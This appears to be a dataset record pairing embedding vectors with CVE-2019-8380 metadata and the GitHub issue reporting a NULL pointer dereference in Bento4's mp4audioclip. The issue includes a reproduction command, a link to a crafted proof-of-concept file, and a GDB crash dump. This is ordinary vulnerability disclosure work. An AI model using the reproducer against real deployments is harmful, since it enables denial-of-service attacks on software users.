0.000613327429164201, -0.0051074521616101265, -0.013727507553994656, -0.008734255097806454, -0.014349695295095444, 0.010632321238517761, 0.01397953275591135, -0.002508440287783742, 0.00014336405729409307, -0.0019305538153275847, 0.010624445043504238, -0.005513055250048637, -0.0015062454622238874, 0.003292081644758582, -0.004473450593650341, 0.00793092418462038, -0.001961072441190481, -0.012790288776159286, -0.021374903619289398, -0.014475707896053791, 0.004902681335806847, -0.0018114324193447828, -0.010955228470265865, 0.002226880518719554, 0.006639293860644102, -0.020839348435401917, 0.00280181341804564, 0.017169229686260223, 0.013451854698359966, 0.011073365807533264, -0.010648072697222233, 0.023391107097268105, 0.00638726819306612, 0.0057493289932608604, 0.026824951171875, -0.008616117760539055, 0.0016844352940097451, -0.027581028640270233, -0.010600817389786243, -0.002374551724642515, 0.011435652151703835, -0.006217938847839832, 0.012278362177312374, -0.01425518561154604, -0.01538929995149374, -0.007135468535125256, 0.01850811392068863, 0.015578319318592548, 0.021878954023122787, 0.005324036348611116, 0.011640422977507114, -0.014656851068139076, 0.0023174521047621965, 0.011963330209255219, -0.016129624098539352, 0.0003763152635656297, 0.0037528155371546745, 0.003870952408760786, 0.003996965009719133, -0.010986731387674809, 0.06039158254861832, 0.005142893176525831, 0.004248990677297115, 0.00949820689857006, -0.008513732813298702, 0.004540394991636276, -0.004339562263339758, -0.01241225004196167, -0.009254056960344315, 0.007131530903279781, 0.002514346968382597, -0.0030479319393634796, -0.014680478721857071, 0.0018852680223062634, -0.011467155069112778, 0.00339840492233634, -0.014515087008476257, -0.008655496872961521, -0.00979748647660017, -0.025486066937446594, -0.007064586505293846, 0.006532970350235701, 0.0211386289447546, -0.002035892568528652, 0.010506308637559414, 0.003431876888498664, 0.02591135911643505, 0.005481552332639694, -0.004174170549958944, -0.03900092840194702, -0.004985377192497253, -0.00548942806199193, 0.01786229945719242, 0.020933859050273895, 0.008474353700876236, -0.002092992188408971, -0.00017474417109042406, 0.030038274824619293, 0.010175525210797787, -0.020240789279341698, 0.003711467608809471, -0.01896491087973118, -0.018807394430041313, -0.007249667774885893, -0.01268790289759636, 0.01064019650220871, -0.016712432727217674, 0.0036366474814713, 0.011286011897027493, 0.009718729183077812, 0.01723223552107811, 0.002957360353320837, -0.0054854899644851685, -0.0010445270454511046, 0.017074719071388245, -0.01978399232029915, -0.0029967394657433033, -0.0078009734861552715, -0.012396498583257198, -0.003526386572048068, 0.011396273039281368, -0.01995726116001606, 0.006265193689614534, -0.0006595976883545518, -0.016476159915328026, 0.004989315290004015, -0.003012490924447775, 0.01655491814017296, -0.010057387873530388, 0.02072908729314804, 0.00694251200184226, -0.010655947960913181, -0.00030395638896152377, -0.023989666253328323, -0.009419448673725128, 0.015294790267944336, 0.006615666206926107, -0.014971883036196232, 0.009884120896458626, -0.0017691000830382109, -0.019815495237708092, -0.013278587721288204, -0.01334159355610609, -0.012916301377117634, -0.004327748436480761, -0.0001822507765609771, -0.028573378920555115, -0.010892221704125404, -0.016428904607892036, 0.011372645385563374, 0.021579673513770103, -0.006564473733305931, -0.010151897557079792, 0.0005714872386306524, -0.008537359535694122, -0.014121297746896744, -0.011033986695110798, 0.003658306086435914, 0.003762660315260291, -0.009191051125526428, 0.012884797528386116, 0.000287466449663043, -0.014656851068139076, 0.004422258120030165, -0.009474579244852066, -0.021107126027345657, -0.00949820689857006, -0.013837768696248531, -0.0076788985170423985, 0.014790739864110947, 0.026446914300322533, 0.019579222425818443, -0.010821339674293995, -0.0012276392662897706, -0.010805588215589523, 0.011734931729733944, 0.011309639550745487, -0.0018872369546443224, 0.023296596482396126, 0.000268269213847816, -0.01655491814017296, 0.0038768593221902847, 0.019988764077425003, 0.0004065878165420145, -0.0131840780377388, -0.00524134049192071, 0.01225473452359438, 0.009553337469696999, 0.01682269386947155, 0.014396950602531433, -0.008214452303946018, 0.0029928013682365417, -0.006985828746110201, -0.008167197927832603, 0.018665630370378494, -0.007155158091336489, -0.017988311126828194, 0.020524317398667336, 0.013845644891262054, -0.008671248331665993, -0.0062376284040510654, 0.03896942362189293, 0.006595977116376162, 0.0002519023255445063, -0.0013300245627760887, -0.007824600674211979, -0.00791123416274786, -0.00524134049192071, 0.0079545509070158, -0.012609144672751427, 0.028478868305683136, -0.00470578670501709, 0.03214898705482483, -0.008482228964567184, 0.00715909618884325, 0.006997642572969198, -0.00033102944144047797, 0.009387945756316185, -0.01913817785680294, 0.01573583483695984, 0.010522060096263885, -0.0014550528721883893, -0.0008244971395470202, 0.014625348150730133, 0.01104973815381527, -0.016854196786880493, 0.0002790984290186316, 0.02291855774819851, 0.020036017522215843, -0.01220747921615839, -0.009104416705667973, 0.002701397053897381, -0.0023174521047621965, -0.01899641379714012, 0.024162933230400085, 0.0007181739201769233, 0.0009903809987008572, 0.015428679063916206, -0.000949525332543999, 0.027707040309906006, 0.01790955476462841, -0.0022583836689591408, -0.018019815906882286, 0.017389751970767975, 0.005320098251104355, -0.0177362859249115, -0.02814808487892151, -0.015712207183241844, -0.003276329953223467, 0.020603075623512268, 0.003551982808858156, -0.013349469751119614, 0.011727056466042995, -0.01650766283273697, -0.02309182658791542, 0.014641099609434605, -0.00030051072826609015, -0.0072378539480268955, 0.009340690448880196, 0.020666081458330154, -0.010994607582688332, -0.005394918378442526, -0.027076978236436844, 0.0013300245627760887 ]
2,033
CVE-2019-8380
2019-02-17T02:29:00.473000
An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in AP4_Track::GetSampleIndexForTimeStampMs() located in Core/Ap4Track.cpp. It can triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/366" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.loginsoft.com/bugs/null-pointer-dereference-vulnerability-in-function-ap4_trackgetsampleindexfortimestampms-bento4-1-5-1-628/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/366
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**Description** - we observed a NULL pointer dereference occured in `AP4_Track::GetSampleIndexForTimeStampMs()` located in `Ap4Track.cpp`.The same be triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./mp4audioclip --start 0 --duration 100 $POC OUTPUTFILE` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/NP_POC?raw=true) **Debug** - **GDB** - ``` 0x00000000004585cb in AP4_Track::GetSampleIndexForTimeStampMs (this=0x6040000001d0, ts_ms=0x0, index=@0x7fffffffdb10: 0x0) at /home/ace/Downloads/sources/Bento4/Source/C++/Core/Ap4Track.cpp:485 485 return m_SampleTable->GetSampleIndexForTimeStamp(ts, index); [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x0 $rbx : 0x7fffffffdd70 → 0x0000000000000000 $rcx : 0x0 $rdx : 0x0 $rsp : 0x7fffffffd9d0 → 0x00007fffffffda00 → 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 $rbp : 0x7fffffffda00 → 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 $rsi : 0x0 $rdi : 0x0 $rip : 0x4585cb → <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rax, QWORD PTR [rax] $r8 : 0x0 $r9 : 0x0 $r10 : 0x60b0000000e0 → 0x14ffffff00000002 $r11 : 0x7fffffffd1d8 → 0x000060c000000090 → 0x00000000005caca0 → 0x00000000004809d6 → <AP4_List<AP4_TrakAtom>::~AP4_List()+0> push rbp $r12 : 0xffffffffb56 → 0x0000000000000000 $r13 : 0x7fffffffdab0 → 0x0000000041b58ab3 $r14 : 0x60b0000000f0 → 0x00000000005ecdb0 → 0x000000000048acd4 → <AP4_SyntheticSampleTable::~AP4_SyntheticSampleTable()+0> push rbp $r15 : 0x0 $eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $ss: 0x002b $fs: 0x0000 $es: 0x0000 $ds: 0x0000 $gs: 0x0000 $cs: 0x0033 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffd9d0│+0x00: 0x00007fffffffda00 → 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 ← $rsp 0x00007fffffffd9d8│+0x08: 0x00007fffffffdb10 → 0x00007fff00000000 0x00007fffffffd9e0│+0x10: 0x000000000000bb80 0x00007fffffffd9e8│+0x18: 0x00006040000001d0 → 0x0000000000596420 → 0x000000000045725e → <AP4_Track::~AP4_Track()+0> push rbp 0x00007fffffffd9f0│+0x20: 0x0000000a00000000 → 0x0000000000000000 0x00007fffffffd9f8│+0x28: 0x0000000000000000 0x00007fffffffda00│+0x30: 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 ← $rbp 0x00007fffffffda08│+0x38: 0x0000000000451b68 → <main+1950> test eax, eax ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x4585c0 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> div BYTE PTR [rax+rcx*1+0x48] 0x4585c4 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov edi, edx 0x4585c6 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> call 0x451140 <__asan_report_load8@plt> → 0x4585cb <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rax, QWORD PTR [rax] 0x4585ce <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> add rax, 0x40 0x4585d2 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rdx, rax 0x4585d5 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rsi, rdx 0x4585d8 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> shr rsi, 0x3 0x4585dc <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> add rsi, 0x7fff8000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:/home/ace/Downloads/sources/Bento4/Source/C++/Core/Ap4Track.cpp+485 ]──── 480 AP4_Track::GetSampleIndexForTimeStampMs(AP4_UI32 ts_ms, AP4_Ordinal& index) 481 { 482 // convert the ts in the timescale of the track's media 483 AP4_UI64 ts = AP4_ConvertTime(ts_ms, 1000, GetMediaTimeScale()); 484 → 485 return m_SampleTable->GetSampleIndexForTimeStamp(ts, index); 486 } 487 488 /*---------------------------------------------------------------------- 489 | AP4_Track::GetNearestSyncSampleIndex 490 +---------------------------------------------------------------------*/ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "mp4audioclip", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x4585cb → Name: AP4_Track::GetSampleIndexForTimeStampMs(this=0x6040000001d0, ts_ms=0x0, index=@0x7fffffffdb10) [#1] 0x451b68 → Name: main(argc=0x7, argv=0x7fffffffdec0) gef➤ p ts $4 = 0x0 gef➤ p index $5 = (AP4_Ordinal &) @0x7fffffffdb10: 0x0 gef➤ p m_SampleTable $6 = (AP4_SampleTable *) 0x0 gef➤ p m_SampleTable->GetSampleIndexForTimeStamp(ts, index) Cannot access memory at address 0x0 ```
NULL POINTER DEREFERENCE in AP4_Track::GetSampleIndexForTimeStampMs()
https://api.github.com/repos/axiomatic-systems/Bento4/issues/366/comments
0
2019-02-07T06:32:20
2019-02-07T06:32:50Z
https://github.com/axiomatic-systems/Bento4/issues/366
407,559,605
366
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : NULL POINTER DEREFERENCE in AP4_Track::GetSampleIndexForTimeStampMs() Issue date: --- start body --- **Description** - we observed a NULL pointer dereference occured in `AP4_Track::GetSampleIndexForTimeStampMs()` located in `Ap4Track.cpp`.The same be triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./mp4audioclip --start 0 --duration 100 $POC OUTPUTFILE` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/NP_POC?raw=true) **Debug** - **GDB** - ``` 0x00000000004585cb in AP4_Track::GetSampleIndexForTimeStampMs (this=0x6040000001d0, ts_ms=0x0, index=@0x7fffffffdb10: 0x0) at /home/ace/Downloads/sources/Bento4/Source/C++/Core/Ap4Track.cpp:485 485 return m_SampleTable->GetSampleIndexForTimeStamp(ts, index); [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x0 $rbx : 0x7fffffffdd70 → 0x0000000000000000 $rcx : 0x0 $rdx : 0x0 $rsp : 0x7fffffffd9d0 → 0x00007fffffffda00 → 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 $rbp : 0x7fffffffda00 → 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 $rsi : 0x0 $rdi : 0x0 $rip : 0x4585cb → <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rax, QWORD PTR [rax] $r8 : 0x0 $r9 : 0x0 $r10 : 0x60b0000000e0 → 0x14ffffff00000002 $r11 : 0x7fffffffd1d8 → 0x000060c000000090 → 0x00000000005caca0 → 0x00000000004809d6 → <AP4_List<AP4_TrakAtom>::~AP4_List()+0> push rbp $r12 : 0xffffffffb56 → 0x0000000000000000 $r13 : 0x7fffffffdab0 → 0x0000000041b58ab3 $r14 : 0x60b0000000f0 → 0x00000000005ecdb0 → 0x000000000048acd4 → <AP4_SyntheticSampleTable::~AP4_SyntheticSampleTable()+0> push rbp $r15 : 0x0 $eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $ss: 0x002b $fs: 0x0000 $es: 0x0000 $ds: 0x0000 $gs: 0x0000 $cs: 0x0033 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffd9d0│+0x00: 0x00007fffffffda00 → 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 ← $rsp 0x00007fffffffd9d8│+0x08: 0x00007fffffffdb10 → 0x00007fff00000000 0x00007fffffffd9e0│+0x10: 0x000000000000bb80 0x00007fffffffd9e8│+0x18: 0x00006040000001d0 → 0x0000000000596420 → 0x000000000045725e → <AP4_Track::~AP4_Track()+0> push rbp 0x00007fffffffd9f0│+0x20: 0x0000000a00000000 → 0x0000000000000000 0x00007fffffffd9f8│+0x28: 0x0000000000000000 0x00007fffffffda00│+0x30: 0x00007fffffffdda0 → 0x0000000000578490 → <__libc_csu_init+0> push r15 ← $rbp 0x00007fffffffda08│+0x38: 0x0000000000451b68 → <main+1950> test eax, eax ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x4585c0 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> div BYTE PTR [rax+rcx*1+0x48] 0x4585c4 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov edi, edx 0x4585c6 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> call 0x451140 <__asan_report_load8@plt> → 0x4585cb <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rax, QWORD PTR [rax] 0x4585ce <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> add rax, 0x40 0x4585d2 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rdx, rax 0x4585d5 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rsi, rdx 0x4585d8 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> shr rsi, 0x3 0x4585dc <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> add rsi, 0x7fff8000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:/home/ace/Downloads/sources/Bento4/Source/C++/Core/Ap4Track.cpp+485 ]──── 480 AP4_Track::GetSampleIndexForTimeStampMs(AP4_UI32 ts_ms, AP4_Ordinal& index) 481 { 482 // convert the ts in the timescale of the track's media 483 AP4_UI64 ts = AP4_ConvertTime(ts_ms, 1000, GetMediaTimeScale()); 484 → 485 return m_SampleTable->GetSampleIndexForTimeStamp(ts, index); 486 } 487 488 /*---------------------------------------------------------------------- 489 | AP4_Track::GetNearestSyncSampleIndex 490 +---------------------------------------------------------------------*/ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "mp4audioclip", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x4585cb → Name: AP4_Track::GetSampleIndexForTimeStampMs(this=0x6040000001d0, ts_ms=0x0, index=@0x7fffffffdb10) [#1] 0x451b68 → Name: main(argc=0x7, argv=0x7fffffffdec0) gef➤ p ts $4 = 0x0 gef➤ p index $5 = (AP4_Ordinal &) @0x7fffffffdb10: 0x0 gef➤ p m_SampleTable $6 = (AP4_SampleTable *) 0x0 gef➤ p m_SampleTable->GetSampleIndexForTimeStamp(ts, index) Cannot access memory at address 0x0 ``` --- end body ---
6,163
[ -0.010444964282214642, 0.016453510150313377, -0.005531164817512035, 0.008801048621535301, 0.016309937462210655, 0.006112636998295784, -0.04798222705721855, 0.03078213520348072, -0.01580743119120598, 0.04376117140054703, -0.01164380181580782, 0.03339517116546631, 0.018004102632403374, 0.007702712435275316, 0.007810392417013645, -0.006701287813484669, -0.018147677183151245, 0.00905948132276535, -0.02368960902094841, 0.019281907007098198, 0.034687332808971405, -0.015146993100643158, -0.020631495863199234, 0.03399818018078804, -0.012785210274159908, 0.016295580193400383, -0.02144986391067505, 0.004317969549447298, -0.009203054010868073, 0.00043251484748907387, -0.007429922930896282, 0.010186532512307167, -0.0015102126635611057, 0.01272778119891882, 0.036984506994485855, 0.01613764837384224, 0.051284413784742355, 0.036381497979164124, 0.002080019563436508, 0.03170100599527359, -0.016654513776302338, -0.05599362403154373, -0.007372493855655193, -0.004737921990454197, -0.004407702945172787, 0.01725752092897892, 0.01421376597136259, 0.0011378191411495209, -0.019009117037057877, 0.005028658080846071, 0.024393118917942047, -0.01230423990637064, -0.03781723231077194, -0.04921695962548256, 0.03569234535098076, -0.03982725739479065, 0.028786465525627136, 0.0205453522503376, -0.00027301377849653363, -0.008987694047391415, -0.016496581956744194, 0.02545556239783764, 0.02212465927004814, 0.025168415158987045, 0.0077170697040855885, 0.008585688658058643, 0.008377507328987122, 0.006231085397303104, -0.015635142102837563, 0.02966226264834404, -0.025168415158987045, -0.05808979272842407, 0.0113566555082798, 0.0423828661441803, 0.027350731194019318, -0.03491704910993576, 0.042813584208488464, 0.04410574585199356, -0.004256951157003641, 0.039597541093826294, -0.02940382994711399, 0.01707087643444538, -0.05938195437192917, 0.03124156966805458, 0.012361668981611729, 0.0026453398168087006, -0.035548772662878036, -0.06925980746746063, -0.02565656416118145, -0.03864995762705803, 0.031327713280916214, 0.01740109547972679, 0.009073838591575623, 0.0377885177731514, 0.0036485588643699884, 0.006697698496282101, -0.014220944605767727, -0.025642206892371178, -0.059037379920482635, -0.0024748463183641434, -0.02683386765420437, -0.03460118547081947, 0.01069621741771698, 0.018205106258392334, 0.016353009268641472, 0.0031370786018669605, 0.014744987711310387, -0.018951687961816788, 0.02453669346868992, 0.140931636095047, 0.01381176058202982, -0.0113566555082798, -0.01602279022336006, -0.020832499489188194, -0.005025068763643503, 0.03201686590909958, -0.00667975191026926, -0.035807203501462936, -0.02350296452641487, -0.03506062179803848, -0.026532363146543503, -0.022426163777709007, -0.010193711146712303, 0.03508933633565903, -0.007304296363145113, 0.06552689522504807, -0.010028601624071598, -0.02663286402821541, -0.02264152467250824, -0.013610757887363434, -0.0032555265352129936, -0.035663630813360214, -0.005886509083211422, -0.012476528063416481, -0.008549795486032963, 0.017961030825972557, -0.02021513320505619, 0.017544668167829514, 0.02020077593624592, -0.005943938624113798, -0.045570194721221924, -0.017831815406680107, 0.03221786767244339, -0.012483706697821617, -0.012060164473950863, -0.010150638408958912, -0.0005796775803901255, 0.017559025436639786, -0.005843436811119318, 0.0018395340302959085, -0.022153373807668686, -0.025096628814935684, 0.020904285833239555, -0.025541706010699272, 0.03201686590909958, -0.005405538249760866, 0.0041277348063886166, 0.0070638107135891914, -0.02480948157608509, -0.007796035148203373, 0.024823838844895363, -0.025053557008504868, 0.04278486967086792, -0.015333638526499271, -0.01460141409188509, -0.024766409769654274, 0.029288971796631813, 0.002295379526913166, -0.02001413144171238, 0.016841158270835876, 0.011579194106161594, 0.0033829479943960905, -0.0074514588341116905, -0.006008546333760023, -0.04002826288342476, -0.019784413278102875, -0.005882919766008854, 0.04043026641011238, 0.00030127979698590934, -0.017573382705450058, -0.016496581956744194, 0.02631700225174427, 0.006155709270387888, -0.015850502997636795, 0.004350273869931698, -0.029432544484734535, 0.04080355912446976, -0.031988151371479034, 0.010868505574762821, 0.009626596234738827, 0.003190918592736125, 0.013862011022865772, 0.017602097243070602, 0.013000570237636566, 0.036324068903923035, -0.0030975958798080683, -0.02960483357310295, -0.029805835336446762, 0.005064551252871752, 0.005829079542309046, 0.011033615097403526, -0.008844121359288692, -0.0038585348520427942, 0.005355287343263626, -0.031988151371479034, 0.014242480508983135, -0.015190064907073975, 0.04054512456059456, 0.03195943683385849, -0.008298542350530624, -0.022340020164847374, -0.01804717443883419, -0.0059188129380345345, 0.011112580075860023, -0.0004598835075739771, 0.001410608529113233, 0.008880014531314373, 0.01962648332118988, 0.004877905827015638, -0.002772761043161154, 0.0020261795725673437, -0.012318597175180912, 0.02598678320646286, -0.021291933953762054, -0.03322288393974304, -0.013194394297897816, -0.005570647772401571, 0.01883682981133461, -0.005226071458309889, -0.004213878884911537, 0.02762352116405964, 0.019339336082339287, -0.025484276935458183, -0.02249795012176037, 0.03227529674768448, -0.012971855700016022, 0.0012194764567539096, -0.01843482255935669, 0.009332270361483097, -0.005987010430544615, -0.001923883450217545, 0.026489291340112686, -0.012218095362186432, 0.017630811780691147, -0.012950319796800613, 0.05160027742385864, -0.0464603491127491, -0.01262727938592434, -0.014859845861792564, 0.02256973646581173, 0.009497379884123802, 0.007024328224360943, -0.009583523496985435, 0.017085233703255653, -0.007175080012530088, -0.006755128037184477, 0.024364404380321503, -0.008470830507576466, 0.006141352001577616, -0.03417046740651131, 0.02637443132698536, -0.00895897950977087, -0.017616454511880875, -0.008585688658058643, 0.012476528063416481, -0.010222425684332848, -0.013266181573271751, -0.004877905827015638, -0.03793209046125412, -0.010028601624071598, 0.023991113528609276, 0.017300592735409737, -0.014673200435936451, -0.03483090549707413, -0.008284185081720352, -0.014019941911101341, 0.024637194350361824, 0.013689722865819931, -0.007688355166465044, 0.021234504878520966, -0.007953966036438942, 0.009949635714292526, -0.028599819168448448, 0.007666819263249636, 0.02802552655339241, 0.00003238813951611519, 0.01112693827599287, -0.030638562515378, -0.032907020300626755, 0.016353009268641472, 0.012821103446185589, 0.01902347430586815, -0.07936736941337585, 0.006227496080100536, -0.003092211904004216, 0.0058075436390936375, 0.005082497838884592, 0.037702374160289764, -0.018736327067017555, 0.008679011836647987, -0.025412490591406822, -0.0016555807087570429, -0.02971969172358513, 0.014759344980120659, -0.023876255378127098, 0.007702712435275316, -0.02249795012176037, -0.013438469730317593, -0.02637443132698536, -0.025096628814935684, 0.030150411650538445, -0.050365544855594635, -0.02604421228170395, -0.0014698326122015715, -0.0007874103030189872, -0.015405424870550632, -0.03365360200405121, -0.006367479916661978, -0.023273246362805367, 0.009425593540072441, -0.02356039360165596, 0.019411122426390648, -0.025053557008504868, 0.023804469034075737, 0.03178714960813522, -0.025771424174308777, 0.0058577945455908775, 0.043531451374292374, -0.06759434938430786, 0.023904969915747643, 0.009497379884123802, 0.007781677879393101, 0.00636389059945941, -0.024062899872660637, -0.008226755075156689, -0.021076573058962822, -0.0324188731610775, -0.0106603242456913, 0.025613492354750633, 0.008076002821326256, -0.015979718416929245, 0.027250230312347412, 0.045110758394002914, -0.009073838591575623, -0.0038693028036504984, 0.008492366410791874, 0.023345032706856728, -0.012476528063416481, 0.0091886967420578, 0.0209330003708601, 0.0010588538134470582, 0.03161486238241196, -0.010789540596306324, -0.015132635831832886, 0.01903783157467842, -0.01942547969520092, -0.012591386213898659, -0.01093311421573162, 0.013373861089348793, -0.010164995677769184, 0.023345032706856728, -0.01685551553964615, -0.007831928320229053, 0.03523290902376175, 0.006977666635066271, 0.009605060331523418, 0.00032707813079468906, 0.014816774055361748, -0.03465861827135086, -0.001265240483917296, -0.020301276817917824, 0.04666135087609291, -0.01639608107507229, 0.004224646836519241, -0.011622265912592411, -0.007566317915916443, 0.009030766785144806, 0.030695991590619087, -0.03735779598355293, 0.015994075685739517, -0.023976756259799004, 0.006722824182361364, 0.01582178846001625, -0.038621243089437485, 0.01712830550968647, 0.027853237465023994, -0.03141385689377785, 0.030638562515378, -0.05033683031797409, -0.028786465525627136, -0.0061951917596161366, 0.06667548418045044, -0.04074613004922867, -0.06707748770713806, 0.0011162831215187907, 0.028513675555586815, -0.01398404873907566, -0.020645853132009506, 0.013503077439963818, -0.04999225586652756, 0.03083956427872181, 0.013180037029087543, 0.024192117154598236, 0.01214630901813507, -0.00004716610419563949, 0.03833409398794174, 0.048125799745321274, -0.0033434652723371983, 0.04519690200686455, 0.0027171263936907053, 0.020373065024614334, -0.006048029288649559, -0.011557658202946186, -0.0102726761251688, 0.036927077919244766, 0.011299225501716137, 0.0018628647085279226, 0.017099590972065926, -0.03388332203030586, 0.008233933709561825, -0.0005253888666629791, 0.018477896228432655, -0.00830572098493576, 0.010811076499521732, 0.026618506759405136, 0.02657543495297432, 0.001157560502178967, -0.0077673206105828285, 0.029633548110723495, -0.042813584208488464, 0.009030766785144806, 0.002167958300560713, -0.010710574686527252, 0.0041708070784807205, 0.016956018283963203, -0.01863582618534565, -0.01043060701340437, -0.03279216215014458, -0.01791795901954174, -0.025182772427797318, -0.04011440649628639, 0.05636691302061081, -0.015233136713504791, 0.02047356590628624, 0.03052370250225067, -0.059496812522411346, -0.03603691980242729, -0.012813924811780453, 0.024909984320402145, -0.01784617267549038, -0.021306291222572327, 0.03313674032688141, 0.04054512456059456, 0.0019759288989007473, -0.005035836715251207, 0.021550366654992104, -0.023330675438046455, -0.008944622240960598, 0.03445761278271675, 0.0023384515661746264, -0.024594122543931007, 0.036525070667266846, 0.008872835896909237, -0.010071673430502415, 0.014802416786551476, 0.006945362780243158, 0.00534810870885849, 0.003923142794519663, 0.00836315006017685, -0.02624521590769291, 0.006435677409172058, -0.014608592726290226, 0.02920282818377018, 0.0059259915724396706, 0.019770056009292603, 0.02179444022476673, -0.02126321941614151, -0.024263903498649597, -0.029317686334252357, -0.05696992203593254, 0.006518232170492411, -0.010976186022162437, -0.03506062179803848, 0.012153487652540207, 0.0014482965925708413, 0.027077941223978996, -0.015132635831832886, -0.011521765030920506, -0.007846285589039326, -0.011579194106161594, 0.031672291457653046, 0.00911691039800644, -0.015333638526499271, -0.03339517116546631, -0.0072755818255245686, 0.004131324123591185, -0.016324294731020927, -0.008621581830084324, 0.018463538959622383, 0.03342388570308685, 0.007282760459929705, -0.013259002938866615, 0.02420647442340851, -0.0029001825023442507, 0.005172231234610081, -0.05389745160937309, -0.027982454746961594, 0.004637420643121004, -0.0066833412274718285, -0.029489975422620773, 0.000021732301320298575, -0.03477347642183304, 0.023603465408086777, -0.029748406261205673, -0.008894371800124645, -0.010401892475783825, 0.003714961465448141, -0.024852553382515907, 0.032648589462041855, 